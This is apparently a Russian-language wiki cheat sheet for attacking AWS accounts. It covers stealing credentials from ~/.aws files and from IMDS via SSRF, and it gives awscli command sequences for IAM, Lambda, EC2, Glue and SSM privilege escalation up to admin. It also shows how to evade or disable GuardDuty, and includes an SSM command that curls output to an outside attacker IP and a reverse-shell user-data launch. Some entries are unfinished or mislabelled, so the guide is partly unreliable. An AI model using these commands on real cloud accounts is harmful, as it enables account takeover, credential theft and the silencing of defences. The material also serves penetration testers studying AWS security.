|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

